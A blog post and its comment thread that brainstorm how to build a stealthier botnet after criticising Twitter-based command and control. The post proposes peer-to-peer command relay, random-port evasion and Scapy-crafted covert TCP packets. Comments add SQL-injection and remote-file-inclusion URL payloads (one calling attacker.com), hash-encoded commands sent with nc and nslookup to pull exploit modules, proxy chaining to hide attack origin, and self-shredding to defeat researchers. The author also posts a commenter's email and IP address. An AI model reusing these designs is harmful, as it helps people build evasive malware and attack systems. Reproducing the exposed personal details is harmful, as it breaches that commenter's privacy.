So, I was going through my backlog of Hak5 podcasts and came across an episode titled “Botnet Command and Control & Man in the Middle Detection”.
In the episode, they interview Robin Wood from DigiNinja and discuss his PoC “KreiosC2“, which is a C&C method that uses Twitter. Here’s the video:
Let me start out by saying that I respect Robin and have used some stuff that he’s released. That said, I have some serious issues with the idea of using a social networking platform to control a botnet, for a multitude of reasons.
I think probably the biggest reason would be that there would be a pretty cut and dry trail of what the bots are doing. This would make it easy for the feds to watch, monitor, and when you get caught, use against you. Kind of hard to deny it when they have all of the tweets. Unlike IRC, which would only be logged if someone is in the channel with logging turned on. Also, using a mechanism that changes the channel key based on the current time will eliminate (for the most part) prying eyes.
Secondly, too easily blocked. This is going to be a common problem regardless of the method. Since the bots require commands, which is in a specific format, it’s pretty simple to get the command list and block tweets (or packets) that contain the commands.
Third, while I appreciate the creativity and thinking outside of the box, I can think of many other methods that would be better suited for this purpose.
In the video, he mentions that someone used the header of an image file to send commands back and forth between bots. To me, this is a far better and more stealthy way of doing things. Al-Qaeda supposedly used this method at one point to send messages back and forth. Pedophiles have also used this for quite some time. It’s effective and, with the right image, never detected.
The biggest problem that bot designers face is that in order for the bots to communicate, they have to know where to go to look for the commands. This means that in any scenario, there’s always a central location.. and because of that, they’re (relatively) easy to shut down. Kill the channel, kill the website, kill the domain, kill the box, kill the.. something, and the control is lost and the bot net is left idle.
Conficker (rev. C) is definitely the best example of C&C that we’ve seen thus far. It randomly generated domain names that it used to send and receive commands. Only using a specific domain name for a certain amount of time before it moved on to the next one, so even if a registrar shut down the domain currently in use, in a short amount of time it would generate a new one.
Domain Generation Algorithm
The domain generation algorithm and query procedure (Figure 2) have been significantly modified from previous versions of Conficker. Among the potential motivations for these changes may be to address the recent actions of the Conficker Cabal, as it has moved to block future registrations of Conficker A and B domains. Among the key changes, Conficker C increases the number of daily domain names generated, from 250 to 50,000 potential Internet rendezvous points. Of these 50,000 domains, only 500 are queried, and unlike previous versions, they are queried only once per day.
Furthermore, C provides significantly more filtering of the IP addresses produced by the DNS queries. The IP address is rejected if it was associated with a query that returned more than one IP address
it is 127.0.0.1 (localhost) or other trivial address it matches an address with an internal blacklist (see Appendix 2 for the full blacklist) another DNS query had previously returned the identical IP. Note, if an organization chooses to register and resolve multiple Conficker C domains to a single IP address, C-infected machines will not contact that IP more than one time. If none of the domains are alive and ready to serve a digitally signed payload, C will sleep for 24 hours, and then will generate a new list of 50,000 domains. The algorithm produces a domain name set that is independent of Conficker A and B, and will overlap these other domain sets only in a rare coincidence. The name of each generated domain is 4 to 10 characters, to which a randomly selected TLD is appended from the following list of 116 suffix (mapping to 110 TLDs):
(Quoted from: http://mtc.sri.com/Conficker/addendumC/)
While I think the idea of “hiding in plain sight” is probably the best method these days, I don’t think using something like Twitter (or Facebook, or Linkedin, or MySpace, or Craigslist (yes, Craigslist could be easily used) etc etc etc) is the answer. Whatever method is used, it needs to provide the following:
1) Not logged, stored, and indexed by Google
2) Incredibly dynamic. Again, think Conficker
3) Secure – hard to fingerprint C&C packets if they’re encrypted
4) Fast
That should help narrow down possible methods. Some to think about:
AIM, Skype, MSN, Yahoo Chat, ICQ, etc. which all do a pretty good job at communicating through firewalls, they’re “private” (ie – your communications aren’t plastered to some website for the world to see), and they’re real time. The problem, though, is that it’s not very dynamic. Once someone disassembles the worm, they’ll see how it operates and will know where to go to intercept.
So, you may be asking.. what is the best method, then?
Well, here’s my theory of what the perfect botnet would look like. The bots would communicate with each other, without the use of an outside service. The worm would propagate and with each successful infection, it would send a “ping” (ping – some kind of packet carrying some kind of data) back to it’s original host, indicating that it had a successful infection. The original host would then ping back with the list of infected hosts that it knows exist. This way, each bot has it’s own list and there is no central server. It would be a lot like P2P, except that there would be no *1* tracker.
For sending commands.. because of the way that this would be set up, the attacker could connect to any node (call it Node 0) and issue a command, which would then be broadcast to every node that Node 0 has in it’s list. When Node 1 receives the command, it would then look at it’s known list of infected hosts and reissue the command. No, it wouldn’t be blazing fast, but it would work quite well and the benefits that would come from this method would certainly outweigh the performance issue.
The bot designer would face a few hurdles, though. The bots would need to communicate over a port that couldn’t be simply firewalled by ISP’s. *cough*25,53,80,110,443*cough* How would I do it, you ask? I would create an array of ports and each bot would randomly choose a port from the array, so there’s no standard. As part of the pingback to the infecting host, it would include the port number that the new offspring has chosen.
Another hurdle using this method is that most people have home routers that are using NAT and if the bot resides on 10.0.0.5:80, the router would have to know to forward incoming traffic to port 80 to that IP. This could be overcome (kind of) by UPnP, since most home routers come with UPnP enabled.
One of the biggest problems that I’ve seen in bot design is that they’ll use some random port that really stands out and is super easy to throw into an ACL at the border of an ISP.. Example.. port 31337, or 1337. I mean, really? Nothing but backdoors and trojans use that port and it takes about 30 seconds to write a rule to block it. Things become much, much more difficult, however, once you have a list of, say, 1000 of the most used legitimate ports (web, mail, etc) and utilize those, randomly, from bot to bot. No longer could an admin just willy-nilly firewall a port.
Ok, so that handles the networking bit.. what about the actual communications between bots? The problem you’d face is that lets say your bots are sending commands back and forth, over all of these random ports, that look like “cmd: synflood 1.2.3.4 500″. Well, there’d be a new IDS rule within seconds of discovery.. which would then lead to detection of the infected hosts and firewalling them. This does not make for a good botnet.
So, lets think about this.. we need a way for the bots to communicate, which would make it difficult to write an IDS rule for. We’re really limited here, actually. We need to use a protocol that’s common and essential to the livelihood of the internet. This immediately rules out ICMP, which is unfortunate because simply encrypting a command and dropping it into the payload of an ICMP packet would work great for the most part. It would be hard to differentiate between random data and encrypted data.
We’re really left with TCP and UDP. In order to transfer data via TCP, there needs to be a full connection, which means it’s going to be slow. You could, however, use a series of crafted packets using different offsets, sequence numbers, etc. using the TCP protocol.
Example:
First packet has the SYN bit enabled and the sequence number is the IP address of the victim.. using Scapy:
>>> packet=IP(src=”1.2.3.133″,dst=”1.2.3.132″)/TCP(sport=80,dport=80,flags=”S”,seq=127001)
>>> s=sr1(packet)
11:06:04.124439 IP (tos 0×0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40) 1.2.3.133.80 > 1.2.3.132.80: S, cksum 0x8a3e (correct), 127001:127001(0) win 8192
Or, maybe a better way would be to have, say:
SYN = first octect
RST = second
PSH = third
ACK = fourth
Example:
>>> packet=IP(src=”1.2.3.133″,dst=”1.2.3.132″)/TCP(sport=80,dport=80,flags=”S”,seq=1)
11:14:33.013806 IP (tos 0×0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40) 1.2.3.133.80 > 1.2.3.132.80: S, cksum 0x7a4f (correct), 1:1(0) win 8192>>> packet=IP(src=”1.2.3.133″,dst=”1.2.3.132″)/TCP(sport=80,dport=80,flags=”R”,seq=2)
11:15:37.654257 IP (tos 0×0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40) 1.2.3.133.80 > 1.2.3.132.80: R, cksum 0x7a55 (correct), 2:2(0) win 8192>>> packet=IP(src=”1.2.3.133″,dst=”1.2.3.132″)/TCP(sport=80,dport=80,flags=”P”,seq=3)
11:16:11.210867 IP (tos 0×0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40) 1.2.3.133.80 > 1.2.3.132.80: P, cksum 0x7a50 (correct), 3:3(0) win 8192>>> packet=IP(src=”1.2.3.133″,dst=”1.2.3.132″)/TCP(sport=80,dport=80,flags=”A”,seq=123)
11:16:46.163235 IP (tos 0×0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40) 1.2.3.133.80 > 1.2.3.132.80: ., cksum 0x79d0 (correct), 123:123(0) ack 0 win 8192
So, the IP address is “1.2.3.123″. Commands could be put into the offset, or window, or options field. This is overly simplified, but a PoC could easily be created using this method of communication.
HOWEVER. Because these packets would definitely be unique (the highest sequence number would be 255), it would be pretty easy to fingerprint using IDS. What we need to do is have our traffic blend in to other traffic, making it difficult to block without affecting other legitimate traffic.
I could sit here and brainstorm all day long about theoretical C&C methods.. but, ultimately, my point is that using a service controlled by someone else (ie – Twitter) is not a very good idea.
I’d like to hear some of your thoughts on this topic. Really think outside of the box, though.
Related posts:
Just a quick point because I very much agree, on the NAT issue, besides UPnP, an interesting approach will be pwnat (http://samy.pl/pwnat/).
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
@muzo: Really? Maybe try a SQL injection, or something, instead.
Here’s Muzo’s information:
muzo
albachat.ch
anonym.sk@hotmail.com
IP Address : 79.126.152.104
Reverse DNS Authenticity : [Possibly Forged]
Proxy Info : No Proxy
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5
inetnum: 79.126.152.0 – 79.126.154.255
netname: MK-ONNET
descr: On.net PPPoE Broadband Internet
country: MK
admin-c: ONON-RIPE
tech-c: ONON-RIPE
status: ASSIGNED PA
mnt-by: ON-MNT
source: RIPE # Filtered
role: Onnet Role Object
address: Partizanski Odredi 70/5
address: P.O. BOX 205
address: 1000 Skopje, Macedonia
abuse-mailbox: .mk
Interesting article. I agree entirely – social networking for c&c is only good for plausible denial.
You can search Google for:
“!scan index.php?redir=” +inurl +intitle
or any other dork, and you’ll find lists of dorks formatted for use by bots on pastebin, wordpress, scribd, facebook, hacked servers and hacking forums, etc.
While technically not complete command and control (no patches, no changes to call back server, just new attack vectors), it could still be used against the botnet. For example, the admins of the affected social networks could alter the list of dorks to something harmless, remove the dork list, or target an opponent’s website by appending site:target.com to each line…
I think it’s feasible for bots to update themselves in the wild without c&c. They would not be able to receive new commands nor updates to the core code, but they could update attack vectors (similar to the aforementioned “! scan DORK” commands on facebook, etc)
Bots could update their list of attack vectors themselves using exploits and vulnerability advisories found online.
It’s more feasible than you may think.
Many vulnerability advisories and exploit headers are formatted in a similar way to the following:
whatever.com/path/to/vuln/file?vuln_param=[EXPLOIT]
whatever.com/path/to/vuln/file?vuln_param=-1+UNION+SELECT+1,2,3,concat(user,”:”,pass),5,6–
whatever.com/path/to/vuln/file?vuln_param=http://attacker.com/remote/file/path/remote_file_name.ext
Some even provide an example URL of a live host.
Many exploits and advisories also provide a google dork which the bot could use to find additional targets.
Using this information a bot could piece together an exploit and proceed to own new systems.
Think about all the types of vulnerabilities which can be represented by a single URL . . . RFI, LFI, RCE, XSS, CSRF, SQLi, DoS and some information disclosure vulnerabilities.
It would be hard for a bot to know how to automate exploitation using LFI, XSS, CSRF and information disclosure but SQLi, RFI and RCE could all be automated to own a box.
Furthermore, it could make use of web application fingerprinting techniques to identify a web app exists before attempting exploitation to decrease detection.
If self-updating bots proves viable perhaps in the future we’ll see a neural network powered worm learning which exploits are the best to gain access to systems and learning to read advisories. . .
Yeah right – who has time to write
skyneta neural network when phishing still works?I always figured: Infect yourself. That way, you look like a victim, not the perpretrator, and can hide commands in botnet maintenance communication (keepalive, host notification, whatnot). To speed up the process, you could have this hidden command crawl to a random node and then that node launches the command “properly” from there. You could even use this to “patsy” other people by making a zombie look like the controlling machine.
To improve performance and connectivity, I’d have a FastTrack-style ring hierarchy — Ring 1 would be machines largely unfirewalled and with fast connections that issue commands to Ring 2, the unwashed masses. (There is no Ring 0 — you are somewhere in Ring 1 or Ring 2, indiscernable from the rest of the botnet.)
As for communication, my first thought is some kind of encrypted VPN-style network with a full-blown key setup and certificates/keys for each node. Doing this autonomously on a P2P scale would be a fun problem indeed. Can you do that kind of private-key auth with SSL? That’d be awfully convenient, port 443 and all.
@roothorick: Thats another option.. becoming patient 0 yourself.
There’s a brief, interesting article on darknet design here : hxxp://www.phreedom.org/blog/2010/darknet-design/
@roothorick: Being patient 0 is kind of risky.
I hope you can bluff stupidity. If your worm spreads slowly it’s game over when you’re asked why you’re at the center of a worm infection. Maybe leave your wireless open?
If “I dunno, I got hacked” worked for plausible denial then I’m sure it would be used in court more often. “What’s an internet?” When you get busted try out “I was writing a random number generator and it became sentient.” I’ve always wanted to see how that would play out in court.
“I was working on it and released it by accident” fails, as per the ILOVEYOU author. Not like he had much of a choice after leaving his name in the worm’s comment header. He did land a security job out of it though.
I like roothorick’s rings idea, although I would go so far as to add a primary XSS layer (Ring 0) which initiates driveby exploits against the browser (using either JS or ActiveX) and attempts to exploit embedded devices within the victim’s intranet (by ip and port scanning with JS). Ring 1 and Ring 2 could spread (in addition to the usual ways – network shares, email, removable media, etc) via the internet using SQL injection, persistent XSS and abusing open redirects to plant the Ring 0 droppers.
I also like roothorick’s idea of SSL/443. Good old IRC supports SSL obviously.
Personally I’d prefer to backdoor the system, sniff network traffic and act on specific commands (encoded as md5 strings) to any port TCP / UDP. You run the risk of having the botnet hijacked should someone reverse engineer the triggers, however rotating the hash salt would buy some extra time. Also, you face the same issue with SSL if the researcher MITMs and runs ssl-strip.
In addition to matt’s node idea :
We miss out of SSL encryption unfortunately, but we can still use md5, sha1 or anything for that matter.
Assume we want to send a command to our bot on target.com to attempt to inject SQL on 192.0.32.*
The command “SQLI” : 0a3b1a03c6bf4091c13b1579ed0bdd32
192 : 58a2fc6ed39fd083f55d4182bf88826d
0 : cfcd208495d565ef66e7dff9f98764da
32 : 6364d3f0f495b6ab9dcf8d3b5c6e0b01
* : 3389dae361af79b04c9c8e7057f60cc6
EOF : 4423718c61c4e8a4362d955bbc7b9711
Putting it all together. HXXP is used but DNS or any other plain text protocol is fine. We could probably even use HXXP over unencrypted HXXPS port 443. At least it would probably appear like benign encoded traffic to a novice network administrator :
nc target.com 80
GET /0a3b1a03c6bf4091c13b1579ed0bdd3258a2fc6ed39fd083f55d4182bf88826dcfcd208495d565ef66e7dff9f98764da6364d3f0f495b6ab9dcf8d3b5c6e0b013389dae361af79b04c9c8e7057f60cc64423718c61c4e8a4362d955bbc7b9711 HXXP/1.0
Host:target.com
The bot on target.com notices a hex pattern in a multiple of 32 bytes and larger than 192 bytes (1 operator, four IP integers and 1 EOF = 6 x 32 character hashes = 192), fly over the wire. It splits by 32 bytes and brute forces the operator and IP address and constructs the command. Obviously we would salt the hashes, even though the salt would be easy to reverse engineer. It then performs the required task, in this case attempting SQLI against the entire 192.0.32.* netblock.
It would be possible to build the bot as a framework and receive files (aka “modules”) over DNS when required, md5 encrypted, and then brute force the output on the other side. Some guidelines would need to be established, like splitting all strings in to 4 byte segments before md5 hashing to speed up brute force, command delimiters, etc. This would be horribly slow, considering today’s internet speeds, but could would be pretty stealthy and could be split up over a period of days or even weeks for the ultra-paranoid, so long as some sort of CRC/resume function was implemented, in a similar way to how TCP/IP handles packets which arrive out of order.
For example, let’s say a bot on 192.168.1.1 needs a gdi-exploit module to escalate privileges. It contacts it’s parent, 192.168.1.2 and asks for the exploit :
Self : 192.168.1.1 : 66efff4c945d3c3b87fc271b47d456db
Command : GMOD (for “get module”) : 7f954fa75dded240ae293957dbebd324
File : escalate/gdi-exploit.exe :
File[0] : esca : ccb1b72dd71e3cf1b722058660cf1c38
File[1] : late : f2c67381db28fa11c59fe7a6df0f2587
File[2] : “/” Category/Filename Delemiter : 6666cd76f96956469e7be39d750cc7d9
File[3] : gdi- : 5de7a70b9350d7a9b973f083e74ed2e7
File[4] : expl : dc653fc0484527ae99855fdd042b2747
File[5] : oit. : be3930bc371559a37c9092ecacad9912
File[6] : exe : 98e83379d45538379c2ac4e47c3be81d
File[7] : EOF : 4423718c61c4e8a4362d955bbc7b9711
Note I’ve introduced “self”. This is a rudimentary check – if the md5hash of the remote IP+salt does not match the first 32 bytes of the request it will abort the request. This could be due to incompatible salts or an incorrect IP. This is meant to catch unwary researchers but will fail pretty horribly when presented with domain names and domains with different IPs. This is merely an example.
Putting it all together :
nslookup x66efff4c945d3c3b87fc271b47d456db7f954fa75dded240ae293957dbebd324ccb1b72dd71e3cf1b722058660cf1c38f2c67381db28fa11c59fe7a6df0f25876666cd76f96956469e7be39d750cc7d95de7a70b9350d7a9b973f083e74ed2e7dc653fc0484527ae99855fdd042b2747be3930bc371559a37c9092ecacad991298e83379d45538379c2ac4e47c3be81d4423718c61c4e8a4362d955bbc7b9711 192.168.1.2
(This may be too long for a domain name, I haven’t checked)
Note the “x” before the request, this is so the recipient bot knows where to begin splitting by 32 bytes, seeing as x will never appear in hex.
The parent responds back to the same port, having been eavesdropping on port 53 :
Self : 192.168.1.2 : 8a120ff3e2c86713f4d346d20f763ee7
Command : WMOD (for “write module”) : cc267bf711c2fbacab7c92d8b69d9e2e
Total Size : (always in bytes) : 3000 : e93028bdc1aacdfb3687181f2031765d
File[0] : binarydata : fa13e55202c138908566cbecca4bd5de
File[1] : binarydata : fa13e55202c138908566cbecca4bd5de
File[2] : binarydata : fa13e55202c138908566cbecca4bd5de
File[3] : EOF : 4423718c61c4e8a4362d955bbc7b9711
nc 192.168.1.1 $CHILD_PORT
GET /x8a120ff3e2c86713f4d346d20f763ee7cc267bf711c2fbacab7c92d8b69d9e2ee93028bdc1aacdfb3687181f2031765dfa13e55202c138908566cbecca4bd5defa13e55202c138908566cbecca4bd5defa13e55202c138908566cbecca4bd5de4423718c61c4e8a4362d955bbc7b9711 HXXP/1.0
Pretty rudimentary . . . But it immediately seems useful, because you can use unwitting users browsing the internet to send commands to your bots using simple HXXP GET requests via image tags.
For example,
Furthermore, we can abuse open and blind proxies to attack other targets or pivot inside an intranet and send code to our bots behind the firewall. There are numerous instances of blind proxies allowing access to internal domains and non-HXXP ports, in fact I’m writing a paper on it at the moment. Consider an open or blind proxy that does check ports or validate domain names :
hxxp://target.com/?url=hxxp://localhost/
hxxp://target.com/?url=hxxp://localhost:21/
hxxp://target.com/?url=hxxp://localhost:22/
hxxp://target.com/?url=hxxp://localhost:25/
hxxp://target.com/?url=hxxp://fbi.gov:80/?THERES_A_BOMB_IN_THE_BUILDING_LOLOLOLOL
You can also chain these together to hide the origin of the command/attack, just make sure you pick open/blind proxies which don’t leak the referrer. Also, the first host in the chain will be able to see the entire chain, and the second host will be able to see all but the first host, and the third host will be able to see all but the first and second hosts, etc. An attacker would abuse this knowledge by starting the proxy chain in a country that is neutral or known to have slack security.
Thoughts?
—
Again, I’m hijacking the conversation from C&C to autonomous behavior without C&C, but with good reason. One of the biggest issues for botnet owners, perhaps even bigger than finding commands as matt suggests, is the discovery of their creation by researchers. The fundamental flaw in using social networks for C&C, as matt suggested, is that they’re too easy to discover, monitor and block.
Current mitigation tactics for botmasters include DDoSing every host from the bot to the researcher, inclusive, and using fake administration panels to distract/lure/monitor researchers (aka `bot hoenypot`, see: hxxp://www.boingboing.net/2010/11/05/botmasters-include-f.html )
I’m still waiting to see a properly paranoid bot. Surely a botmaster would prefer to lose a few bots than risk discovery? The longer it takes researches to reverse engineer, the more time available to propagate. Where’s the bot that stops all aggressive behavior the second it spots a sniffer in memory or an access attempt at its admin panel or a portscan from localhost, or an incorrect key used with a remote bot command, etc, etc? Blocking security tools from running (such as regedt32 and hijackthis.exe) just screams infection, even if it is annoying to have to rename your files.
Let’s say I’m a bot and I’ve detected I’m under attack — from localhost! I can’t remove myself from memory or else the local rootkit files and processes will become visible. I know someone is already on to me but chances are they won’t find where I came from unless they’ve been watching me since infection. I can’t blacklist the IP because this could be too easily exploited by researchers (also, the IP is localhost in this case). We can’t just uninstall, for the same reason. Furthermore we can’t call home for fear of giving away our parents locations.
Fight, flight or ahem; propagate.
Fight? — They’ve cut off internet access and I can’t call in DDoS support. Not that I’d want to because giving away the locations of other bots by calling them in to an obviously malicious environment is pretty stupid. Yeah I said it. Come get me Conficker botmasters.
Propagate – Ideally I would go silent for 12-72 hours then revert to some sort of autonomous behavior whereby I don’t take commands for fear of infection, but continue to spread to achieve pre-programmed goals (ie, privilege escalation, network privilege escalation or webserver infection for ring 0), prioritizing based on my location and privileges on the local network. The idea from here on out is that i’ve been compromised. I’ll continue to infect hosts and point the dropper at myself as their parent, but i will no longer take commands. This would be fine against a curious home user but wouldn’t stand up against a researcher in a test lab.
Theoretically I could occasionally send SOS messages to random IPs in the vein hope they’re friendly. This way it would be possible to blacklist the address and stop other copies of the worm from contacting the compromised network in distress. Again this just begs to be abused by researchers.
Against researchers I take a highly emo alternative where, short of uninstalling myself, flight is appealing. Detecting the existence of a VM with no network access is crucial and is probably the only time I’d consider such a drastic option :
Shut down all outbound bot connections. Stop any background process, such as writing to removable media or attempted network password cracking. Write dropper to start-up, write shredder binary to temp, shred all bot files which aren’t being used to hide the process, close bot processes/threads and shred the remaining bot’s file(s). This leaves the researcher with practically nothing on me. They have a generic shredder file, a dropper of which they were probably already aware (why else is a researcher watching me?) and whatever they managed to sniff from the wire or dump from memory.
Granted there’s no real way to stop a researcher running the worm in a VM, unless you can break out. You can only make their job more difficult.
1770 words!? I swear you need to put a word limit on comments or I’d keep typing.
Oops.
“Consider an open or blind proxy that does check ports or validate domain names”
Should read :
“Consider an open or blind proxy that DOESN’T check ports or validate domain names/ips.”